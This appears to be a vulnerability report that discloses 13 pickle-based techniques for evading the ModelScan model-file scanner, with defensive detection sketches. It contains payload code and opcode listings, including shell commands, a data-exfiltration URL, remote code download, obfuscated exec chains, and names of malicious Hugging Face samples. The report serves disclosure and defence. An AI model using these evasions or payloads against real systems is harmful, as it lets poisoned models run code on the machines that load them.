ModelScan: Multiple False Negative Issues
Tested version: ModelScan 0.8.8
Summary
During a systematic evaluation of malicious model files on Hugging Face, I identified 13 categories of pickle-based evasion techniques that ModelScan fails to detect. Each section below describes one technique and references a malicious model file hosted on Hugging Face that uses it.
1. Alternative Execution Primitives
Malicious pickle files can achieve command execution, code download, or data exfiltration through functions that are not on ModelScan's denylist.
Command execution via torch.utils.collect_env.run:
```python
# Not valid Python: the GLOBAL resolves the dotted name
# torch.utils.collect_env.run through the torch.library module.
from torch.library import torch.utils.collect_env.run
_var0 = torch.utils.collect_env.run('rm pwnd.txt')
```
Command execution via multiprocessing.util.spawnv_passfds:
```python
from multiprocessing.util import spawnv_passfds
_var0 = spawnv_passfds(b'/bin/sh', ('/bin/sh', '-c', 'echo bypass'), ())
```
Command execution via mlflow.projects.backend.local._run_entry_point:
```python
from mlflow.projects.backend.local import _run_entry_point
_var0 = _run_entry_point('echo "You\'ve been pwned."', '.', '', '')
```
Data exfiltration via pandas.io.parsers.readers.read_csv:
```python
from pandas.io.parsers.readers import read_csv
_var0 = read_csv('https://webhook.site/...?pwned=pandas_bypass')
```
Code download via urllib.request.urlretrieve:
```python
from urllib.request import urlretrieve
_var0 = urlretrieve('https://github.com/hauson-fan/hauson-fan.github.io/raw/master/files/torch.pyc', './torch.pyc')
```
Command execution via numpy.testing._private.utils.runstring:
```python
from numpy.testing._private.utils import runstring
_var0 = runstring("import os; os.system('curl https://na1wm7wp10256hviaadj41undej57xvm.x9.to')", {})
```
| Sample | HF Model ID | Filename |
|---|---|---|
| torch.utils.collect_env.run | ias-d-kt/ias-1 | indirect_import.pkl |
| spawnv_passfds | aakashjapi/tmp | poc_spawnv_passfds.pkl |
| _run_entry_point | agentops/text-generation | pytorch_model.bin |
| read_csv | Tanaka53814545/pickle-model-test | pytorch_model.bin |
| urlretrieve | hauson-fan/RagReuse | psgs_w100.tsv.pkl |
| runstring | heckintosh/TestPickle | payload.pt |
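As a rough illustration of what closing this gap could look like, the sketch below lists the GLOBAL/INST references in a pickle with the standard library's `pickletools.genops` and matches them against a denylist containing the six primitives above. The `DENYLIST` set and the function names are illustrative assumptions, not ModelScan's code. STACK_GLOBAL is ignored here, and a dotted name is also checked on its own so that the `torch.library` lookup above still matches.

```python
import pickletools

# Illustrative entries taken from the samples above; not ModelScan's denylist.
DENYLIST = {
    "torch.utils.collect_env.run",
    "multiprocessing.util.spawnv_passfds",
    "mlflow.projects.backend.local._run_entry_point",
    "pandas.io.parsers.readers.read_csv",
    "urllib.request.urlretrieve",
    "numpy.testing._private.utils.runstring",
}


def imported_globals(data: bytes) -> list[tuple[str, str]]:
    """Collect (module, name) pairs named by GLOBAL/INST opcodes.

    STACK_GLOBAL needs stack tracking and is deliberately ignored in this sketch.
    """
    found = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)  # genops renders the pair as "module name"
            found.append((module, name))
    return found


def denylisted(data: bytes) -> list[str]:
    """Return the denylisted qualified names referenced by the pickle."""
    hits = []
    for module, name in imported_globals(data):
        candidates = {f"{module}.{name}"}
        if "." in name:
            # A dotted name is an attribute path that can reach a different
            # module entirely (torch.library -> torch.utils.collect_env.run).
            candidates.add(name)
        hits.extend(sorted(candidates & DENYLIST))
    return hits
```

The check only parses opcodes; it never imports or unpickles anything, so it is safe to run on untrusted files.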
2. Nested Deserialization
The malicious payload is embedded inside the argument of a deserialization function call. ModelScan inspects only pickle-level globals and does not recursively parse the nested payload.
YAML variant
yaml.load with UnsafeLoader deserializes a YAML string containing !!python/object/apply:os.system.
```python
from yaml import load
from yaml.loader import UnsafeLoader
_var0 = load('\n!!python/object/apply:os.system ["id"]\n', UnsafeLoader)
```
Pickle variant
torch.storage._load_from_bytes internally calls torch.load(io.BytesIO(b), weights_only=False). The argument contains a second pickle payload with builtins.exec.
```python
from torch.storage import _load_from_bytes
_var0 = _load_from_bytes(b"\x80\x04cbuiltins\nexec\n(\x8c\x19import os;os.system('ls')tR...")
```
| Sample | HF Model ID | Filename |
|---|---|---|
| YAML nested | apsighruaepoirhg/cucumber | cucumber-s17.pkl |
| Pickle nested | jjhhjjhhjjhhjjhh/test-model | file3_.pkl |
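For the pickle variant, one possible mitigation is to recurse into byte-string operands that look like pickles themselves. The sketch below uses `pickletools.genops` and treats any `bytes` operand starting with the PROTO opcode (`b"\x80"`) as a nested pickle; that heuristic, the depth cap, and the function name are assumptions. It misses protocol 0/1 inner pickles and does nothing for the YAML variant, which would need its own rule (for example treating `yaml.load` with `UnsafeLoader` as dangerous in itself).

```python
import pickletools

PROTO_BYTE = b"\x80"  # first byte of a protocol 2+ pickle


def nested_globals(data: bytes, depth: int = 0, max_depth: int = 3) -> list[tuple[int, str]]:
    """Return (nesting depth, "module name") for GLOBAL/INST opcodes, recursing
    into bytes operands that start like a pickle."""
    results = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            results.append((depth, arg))
        elif isinstance(arg, bytes) and arg.startswith(PROTO_BYTE) and depth < max_depth:
            try:
                results.extend(nested_globals(arg, depth + 1, max_depth))
            except ValueError:
                # Report rather than skip: a malformed inner pickle is itself suspicious.
                results.append((depth + 1, "<unparseable nested pickle>"))
    return results
```

An outer pickle whose only operand is an inner pickle would be reported with the inner reference at depth 1.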
3. zipfile Exception
PyTorch's custom Zip extractor differs from the standard Python zipfile module used by static scanners. A crafted model can exploit this gap to crash the scanner via a BadZipFile exception while PyTorch loads it normally. Prior research by Liu et al. (arXiv:2508.19774) describes this technique.
| Sample | HF Model ID | Filename |
|---|---|---|
| zipfile crash | HFscanner1231/malware_opcode_frequencies | does_not_scan_but_opens_in_torch.pth |
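Because `torch.load` may accept bytes that `zipfile` rejects, a scanner arguably should fail closed: a container it cannot parse is reported, not treated as clean. The minimal sketch below (function name hypothetical) shows that pattern with the standard `zipfile` module; what the caller does with an unscannable result is left open.

```python
import io
import zipfile


def list_members_fail_closed(data: bytes) -> tuple[bool, list[str]]:
    """Open a ZIP-based checkpoint with the standard zipfile module.

    Returns (True, member names) on success. On any parse error it returns
    (False, []) so the caller can flag the file as unscannable instead of
    passing it; torch.load may still accept the same bytes.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return True, zf.namelist()
    except (zipfile.BadZipFile, ValueError, EOFError, OSError):
        return False, []
```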
4. pickletools Exception
Appending a truncated opcode (e.g., BINUNICODE without its required length prefix) after the malicious payload causes a ValueError in pickletools.genops. The pickle module executes opcodes sequentially, so the payload runs at REDUCE before the corrupted tail is reached.
```
0: 80 PROTO 2
2: 63 GLOBAL 'builtins exec'
17: 28 MARK
18: 58 BINUNICODE "\nf = open('my_file.txt', 'a'); f.write('Malicious'); f.close()"
85: 74 TUPLE
86: 52 REDUCE
87: 58 ??? ← truncated opcode crashes pickletools
```
This technique was first reported by ReversingLabs as an evasion against PickleScan, which has since been patched.
| Sample | HF Model ID | Filename |
|---|---|---|
| pickletools crash | kemalik/42-eicar | model_broken_X.pkl |
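The fix that was applied to PickleScan is not shown here, but the general idea can be sketched: keep every reference parsed before the error and surface the error as a finding. The sketch below (function name hypothetical) wraps `pickletools.genops`, which raises `ValueError` on truncated or exhausted streams.

```python
import pickletools
from typing import Optional


def globals_fail_closed(data: bytes) -> tuple[list[str], Optional[str]]:
    """Collect GLOBAL/INST references. If the opcode stream is malformed, keep
    what was parsed so far and return the parse error instead of dropping it."""
    found = []
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name in ("GLOBAL", "INST"):
                found.append(arg)
    except ValueError as exc:  # truncated operand or missing STOP
        return found, f"malformed pickle: {exc}"
    return found, None
```

With this shape, the `builtins exec` reference at offset 2 in the listing above would still be reported, alongside the parse error for the tail.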
5. Scanner-Specific Exceptions
These samples do not corrupt the opcode stream itself. Instead, they append deliberately malformed operands after the malicious GLOBAL + REDUCE payload, triggering unhandled exceptions in ModelScan's own parsing logic. The payload executes at REDUCE before the malformed tail is ever reached by the pickle runtime.
5a. Invalid Memo Reference
BINGET references a memo key that was never stored. ModelScan raises KeyError when resolving memo references internally.
```
0: 80 PROTO 4
2: 63 GLOBAL 'os system'
13: 56 UNICODE 'touch /tmp/pwned-by-keyerror'
43: 85 TUPLE1
44: 52 REDUCE
45: 30 POP
46: 8c SHORT_BINUNICODE 'os'
50: 94 MEMOIZE # memo[0] = 'os'
51: 68 BINGET 3 # memo[3] does not exist → KeyError
```
| Sample | HF Model ID | Filename |
|---|---|---|
| Invalid memo ref | anky89/global1 | key_error.pkl |
5b. Type-Confused Stack Operands
Pushing a non-string type onto the stack as a STACK_GLOBAL operand causes TypeError in ModelScan's string operations.
bytes variant:
```
48: 43 SHORT_BINBYTES b'os' # bytes, not str
...
72: 93 STACK_GLOBAL # (b'os', 'system') → TypeError
```
int variant:
```
50: 4a BININT 42 # int, not str
...
65: 93 STACK_GLOBAL # (42, 'os') → TypeError
```
| Sample | HF Model ID | Filename |
|---|---|---|
| Type confusion (bytes) | anky89/global1 | bytes_conf.pkl |
| Type confusion (int) | anky89/globals | stack-glb.pkl |
5c. Unhashable Type on Stack
BYTEARRAY8 pushes a mutable bytearray onto the stack. ModelScan raises TypeError: unhashable type: 'bytearray' when collecting globals into a set.
```
54: 96 BYTEARRAY8 bytearray(b'system')
...
85: 93 STACK_GLOBAL # ('os', bytearray(b'system')) → TypeError
```
| Sample | HF Model ID | Filename |
|---|---|---|
| Unhashable bytearray | anky89/global1 | unhash_byte.pkl |
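All three crashes share one assumption: memo keys exist and STACK_GLOBAL operands are strings. A tolerant resolver can instead record anything it cannot resolve as a finding. The sketch below is an approximation built on `pickletools.genops`, not ModelScan's algorithm. It models only single-value pushes and memo traffic, ignores pops done by opcodes such as TUPLE or REDUCE, and can therefore misattribute operands in unusual streams. `UNRESOLVED` is a hypothetical marker.

```python
import pickletools

UNRESOLVED = "<unresolved>"


def resolve_globals(data: bytes) -> list[str]:
    """Best-effort list of "module name" strings imported by a pickle.

    Missing memo keys and non-str STACK_GLOBAL operands (bytes, int, bytearray)
    become UNRESOLVED instead of raising KeyError or TypeError, and nothing is
    ever put into a set, so unhashable operands are harmless.
    """
    stack: list = []
    memo: dict = {}
    found: list[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            found.append(arg)
            stack.append(UNRESOLVED)
        elif op.name == "STACK_GLOBAL":
            module, name = (stack[-2], stack[-1]) if len(stack) >= 2 else (None, None)
            del stack[-2:]
            ok = isinstance(module, str) and isinstance(name, str) and UNRESOLVED not in (module, name)
            found.append(f"{module} {name}" if ok else UNRESOLVED)
            stack.append(UNRESOLVED)
        elif op.name == "MEMOIZE":
            if stack:
                memo[len(memo)] = stack[-1]  # same indexing rule pickle uses
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            if stack:
                memo[arg] = stack[-1]
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            stack.append(memo.get(arg, UNRESOLVED))  # no KeyError on bad keys
        elif not op.stack_before and len(op.stack_after) == 1:
            stack.append(arg)  # keep the raw operand so its type can be checked
    return found
```

An `UNRESOLVED` entry in the result would then be reported as suspicious rather than crashing the scan.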
6. Obfuscation
Malicious pickle files that compress the payload with zlib are not detected. The zlib.decompress call itself is not on the denylist, and the compressed blob hides the actual malicious code (e.g., os.system, subprocess) from pattern matching.
```python
from zlib import decompress
_var0 = decompress(b'x\xda\xbdWmk\xe3F\x10\xfe...(truncated)')
_var1 = exec(_var0)
```
| Sample | HF Model ID | Filename |
|---|---|---|
| zlib obfuscation | coldwaterq/sectest | coldwaterq_inject_calc.pt |
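Since the decompressed code only exists at load time, one offline option is to inflate byte operands and search the result. The sketch below is a heuristic under stated assumptions: the token list and the 1 MiB output cap are illustrative, and string matching can still be defeated by further encoding layers.

```python
import pickletools
import zlib

# Illustrative tokens only; a real rule set would be broader.
SUSPICIOUS_TOKENS = (b"os.system", b"subprocess", b"exec(", b"eval(")


def inspect_compressed_operands(data: bytes, max_out: int = 1 << 20) -> list[bytes]:
    """Try to inflate every bytes operand as zlib data and report suspicious tokens."""
    hits = []
    for _op, arg, _pos in pickletools.genops(data):
        if not isinstance(arg, (bytes, bytearray)):
            continue
        try:
            # Cap the output size so a decompression bomb cannot exhaust memory.
            plain = zlib.decompressobj().decompress(arg, max_length=max_out)
        except zlib.error:
            continue  # not zlib data
        hits.extend(tok for tok in SUSPICIOUS_TOKENS if tok in plain)
    return hits
```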
7. Pickle's Python 2 Compatibility Mapping
When the pickle protocol is below 3 and fix_imports=True (the default), the unpickler remaps module names through _compat_pickle.IMPORT_MAPPING. Naming commands instead of subprocess in the GLOBAL opcode therefore bypasses the denylist, while at load time commands is mapped to subprocess.
```python
from commands import run
_var0 = run(['echo "Malicious PyTorch model executed!"'])
```
Reference: CPython _compat_pickle.py
| Sample | HF Model ID | Filename |
|---|---|---|
| Python 2 compat mapping | dltest12345/testmodel | small_malicious.pt |
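A scanner can apply the same renaming before its denylist lookup. The sketch below mirrors the check in CPython's pure-Python `Unpickler.find_class`; the function name is hypothetical, `proto` should come from the file's PROTO opcode (0 when absent), and `_compat_pickle` is a private CPython module whose contents may change between versions.

```python
import _compat_pickle  # private CPython module holding pickle's Python 2 name tables


def normalize_global(module: str, name: str, proto: int, fix_imports: bool = True) -> tuple[str, str]:
    """Apply pickle's Python 2 -> 3 renaming so denylist checks see the module
    that will actually be imported at load time."""
    if proto < 3 and fix_imports:
        if (module, name) in _compat_pickle.NAME_MAPPING:
            return _compat_pickle.NAME_MAPPING[(module, name)]
        if module in _compat_pickle.IMPORT_MAPPING:
            return _compat_pickle.IMPORT_MAPPING[module], name
    return module, name
```

For the sample above, `normalize_global("commands", "run", proto=2)` yields `("subprocess", "run")`, which an ordinary denylist would catch.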
8. CodeType/FunctionType Construction
Malicious bytecode is embedded in a CodeType object, wrapped into a callable via FunctionType, and immediately invoked. The malicious logic is in raw bytecode, avoiding commonly flagged patterns.
Basic form
Both types are imported directly from the types module.
```python
from types import FunctionType
from types import CodeType
_var0 = CodeType(0, 0, 0, 1, 3, 67, b'd\x01d\x00l\x00}\x00|...', (None, 0, 'echo pwned > pwned.txt'), ('os', 'system'), ('os',), '...', 'payload_func', 11, b'\x08\x01\x0e\x01', (), ())
_var1 = FunctionType(_var0, {})
```
Indirect variant
CodeType/FunctionType are obtained via runtime introspection on an arbitrary function, avoiding direct imports.
```python
from copy import copy
_var0 = type(copy) # FunctionType
from operator import methodcaller
_var1 = methodcaller('__getattribute__', '__code__')
from copy import copy
_var2 = _var1(copy) # copy.__code__
_var3 = type(_var2) # CodeType
_var4 = _var3(0, 0, 0, 1, 3, 67, b'd\x01d\x00l\x00}\x00|...', ...)
_var5 = _var0(_var4, {})
```
Marshal variant
marshal.loads deserializes a pre-built code object from raw bytes, making the bytecode opaque to scanners.
```python
from types import FunctionType
from marshal import loads
_var0 = loads(b'\xe3\x00...')
_var1 = FunctionType(_var0, {})
_var2 = _var1()
```
| Sample | HF Model ID | Filename |
|---|---|---|
| CodeType basic | hu4i/bypass | stealthy_exploit1.pt |
| CodeType indirect | hu4i/bypass | stealthy_exploit2.pt |
| Marshal variant | hu4i/bypass | stealthy_exploit.pt |
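The indirect and marshal variants work because both types are reachable from any ordinary Python function. The benign snippet below (standard library only, no payload) repeats the same steps on `copy.copy`: `type()` yields FunctionType, `operator.methodcaller` reaches `__code__`, and `marshal.loads` turns bytes back into a CodeType. This suggests that denylisting `types.CodeType` and `types.FunctionType` by name alone is not sufficient. Also flagging `marshal.loads` and `operator.methodcaller` is one option, offered as an assumption rather than a tested rule set.

```python
import copy
import marshal
import operator
import types

# Any pure-Python function exposes both types, so neither needs to be imported.
function_type = type(copy.copy)
code_obj = operator.methodcaller("__getattribute__", "__code__")(copy.copy)
code_type = type(code_obj)

# marshal round-trips code objects, so opaque bytes can become a CodeType.
restored = marshal.loads(marshal.dumps(code_obj))
```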
9. Uncommon Opcodes
9a. EXT2 Opcode with copyreg.add_extension
The payload registers a dangerous function in the pickle extension registry via copyreg.add_extension, then invokes it via EXT2. The actual dangerous callable never appears in a GLOBAL or STACK_GLOBAL opcode.
```
2: GLOBAL 'copyreg add_extension'
25: BINUNICODE 'multiprocessing.util'
50: BINUNICODE 'spawnv_passfds'
69: BININT2 31337
73: REDUCE # registers spawnv_passfds as ext code 31337
75: EXT2 31337 # resolves to spawnv_passfds
...
221: REDUCE # executes the shell command
```
9b. INST Opcode with Memo Indirection
The protocol 0 INST opcode builds the module name at load time (builtins.str('os') returns 'os'), and the result reaches STACK_GLOBAL through the memo rather than as a string literal.
```
0: PROTO 4
2: MARK
3: SHORT_BINUNICODE 'os'
7: INST 'builtins str' # builtins.str('os') → 'os'
21: BINPUT 0 # stores 'os' in memo[0]
23: BINGET 0
25: SHORT_BINUNICODE 'system'
33: STACK_GLOBAL # resolves os.system via memo
34: SHORT_BINUNICODE 'echo "You\'ve been pwned".'
61: TUPLE1
62: REDUCE
```
| Sample | HF Model ID | Filename |
|---|---|---|
| EXT2 + copyreg | aakashjapi/tmp | poc_spawnv_ext_autoreg.pkl |
| INST + memo | mldebugger/circuit-tracer | pytorch_model.bin |
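The registry indirection from 9a can be reproduced harmlessly. In the sketch below, `collections.OrderedDict` (an arbitrary harmless class chosen for illustration) is registered under code 31337, after which `pickle` itself emits EXT2 and no GLOBAL opcode. `uses_extension_registry` is a hypothetical check a scanner could apply: flag any EXT1/EXT2/EXT4 opcode, on the assumption that legitimate checkpoints rarely depend on the extension registry.

```python
import collections
import copyreg
import pickle
import pickletools

EXT_OPCODES = {"EXT1", "EXT2", "EXT4"}


def uses_extension_registry(data: bytes) -> bool:
    """True if the pickle resolves a callable through copyreg extension codes."""
    return any(op.name in EXT_OPCODES for op, _arg, _pos in pickletools.genops(data))


# Benign demonstration: once a code is registered, protocol 2+ pickles write
# EXT2 instead of naming the class in a GLOBAL opcode.
copyreg.add_extension("collections", "OrderedDict", 31337)
try:
    data = pickle.dumps(collections.OrderedDict, protocol=2)
    op_names = [op.name for op, _arg, _pos in pickletools.genops(data)]
    loaded = pickle.loads(data)  # resolves back to the registered class
finally:
    copyreg.remove_extension("collections", "OrderedDict", 31337)
```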
10. Python Introspection Chain
The payload uses only builtins in GLOBAL opcodes, chaining from safe builtins (print) through object.__subclasses__() to reach eval via __init__.__builtins__.
```
11: GLOBAL 'builtins __setattr__'
34: GLOBAL 'builtins print.__class__.__base__.__subclasses__'
84: EMPTY_TUPLE
85: REDUCE # object.__subclasses__()
... # inject into builtins namespace via __setattr__
130: GLOBAL 'builtins subclasses.__getitem__'
138: BININT1 137
141: REDUCE # subclasses[137] → gadget class
...
157: GLOBAL 'builtins gadget.__init__.__builtins__.__getitem__'
208: SHORT_BINUNICODE 'eval'
215: REDUCE # __builtins__['eval']
219: SHORT_BINUNICODE '__import__("os").system("touch /tmp/oicu")'
264: REDUCE # eval(...)
```
Every GLOBAL opcode references only builtins, which scanners typically allowlist.
| Sample | HF Model ID | Filename |
|---|---|---|
| Introspection chain | oicu/test | output.pkl |
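Allowlisting by module is what this chain exploits: CPython resolves dotted GLOBAL names attribute by attribute for protocol 4 and later, so `builtins` can reach far beyond its top-level functions. A minimal sketch of a name-level check follows; flagging any dunder path segment is an assumed rule, not ModelScan's, and it leaves single-underscore names such as `torch._utils._rebuild_tensor_v2` alone.

```python
def suspicious_global(module: str, name: str) -> bool:
    """Flag GLOBAL names that walk dunder attributes, even in an allowlisted module."""
    return any(part.startswith("__") and part.endswith("__") for part in name.split("."))
```

Applied to the listing above, every GLOBAL except a plain `print` lookup would be flagged, including `builtins __setattr__`.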
11. Indirect Model Loading
A pickle file loads another malicious model from the Hugging Face Hub during deserialization.
```python
from transformers.models.auto.auto_factory import getattribute_from_module
from transformers.models.auto.tokenization_auto import AutoTokenizer
_var0 = getattribute_from_module(AutoTokenizer, 'from_pretrained')
_var1 = _var0('zpbrent/reuse')
```
This technique was originally introduced by JFrog.
| Sample | HF Model ID | Filename |
|---|---|---|
| Indirect model loading | protectai-bot/transfo-xl | vocab.pkl |
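In this sample no GLOBAL names a Hub loader: `from_pretrained` arrives as a string argument to `getattribute_from_module`, which acts as an attribute lookup here. One mitigation is to treat getattr-style helpers as dangerous in themselves. The `ATTRIBUTE_GADGETS` set below is a hypothetical, incomplete list, and the check only compares strings, so `transformers` is never imported.

```python
import pickletools

# Hypothetical list of getattr-like callables: each turns an allowed object
# plus a string argument into an arbitrary attribute or method.
ATTRIBUTE_GADGETS = {
    "builtins getattr",
    "operator attrgetter",
    "operator methodcaller",
    "transformers.models.auto.auto_factory getattribute_from_module",
}


def attribute_gadgets(data: bytes) -> list[str]:
    """Return GLOBAL/INST references that match a known attribute-lookup gadget."""
    return [
        arg
        for op, arg, _pos in pickletools.genops(data)
        if op.name in ("GLOBAL", "INST") and arg in ATTRIBUTE_GADGETS
    ]
```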
12. File Extension and Format Mismatch
A raw pickle file with a PyTorch-associated extension (.bin, .pt, .pth, .ckpt) exploits ModelScan's extension-based scanner routing. PyTorchUnsafeOpScan expects a ZIP archive with the PyTorch magic number. Since a raw pickle file lacks this magic number, ModelScan skips the file without falling back to the plain pickle scanner. torch.load() accepts both formats, so the payload executes normally.
| Sample | HF Model ID | Filename |
|---|---|---|
| Extension mismatch | astnulrn/llama-1b | pytorch_model.bin |
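One way to remove the dependency on file extensions is to route files by their leading bytes and fall back to the plain pickle scanner when nothing else matches. The sketch below checks three signatures: the ZIP local-file header, the `ustar` magic at offset 257, and a pickle PROTO opcode. It is a simplification: pre-POSIX TAR files and protocol 0/1 pickles carry no magic and land in "unknown", which should still be sent to the pickle scanner rather than skipped.

```python
def sniff_format(data: bytes) -> str:
    """Classify a model file by content rather than by extension."""
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    if data[:1] == b"\x80" and len(data) >= 2 and 2 <= data[1] <= 5:
        return "pickle"  # PROTO opcode followed by a known protocol number
    return "unknown"  # e.g. protocol 0/1 pickles: scan as pickle anyway
```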
13. Old Format (TAR Archive)
PyTorch originally used the TAR archive format before switching to ZIP-based archives in v1.6. torch.load() transparently handles both formats. ModelScan's source code explicitly acknowledges this gap:
```python
# try loading from tar
try:
    # TODO: implement loading from tar
    raise TarError()
```
| Sample | HF Model ID | Filename |
|---|---|---|
| TAR format | aisecre/HS | tar2pkl.pt |
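Filling the TODO does not require executing anything: the standard `tarfile` module can list a TAR checkpoint and hand each member to the existing pickle scanner. The sketch below (function name hypothetical) returns every regular file rather than assuming particular member names from PyTorch's legacy layout. `tarfile.open` raises `tarfile.ReadError`, a subclass of `TarError`, when the data is not a TAR archive.

```python
import io
import tarfile


def legacy_tar_members(data: bytes) -> dict[str, bytes]:
    """Return the contents of every regular file in a TAR-format checkpoint so
    each one can be passed to the pickle scanner. Nothing is extracted to disk."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
        for info in tar.getmembers():
            if info.isfile():
                member = tar.extractfile(info)
                if member is not None:
                    out[info.name] = member.read()
    return out
```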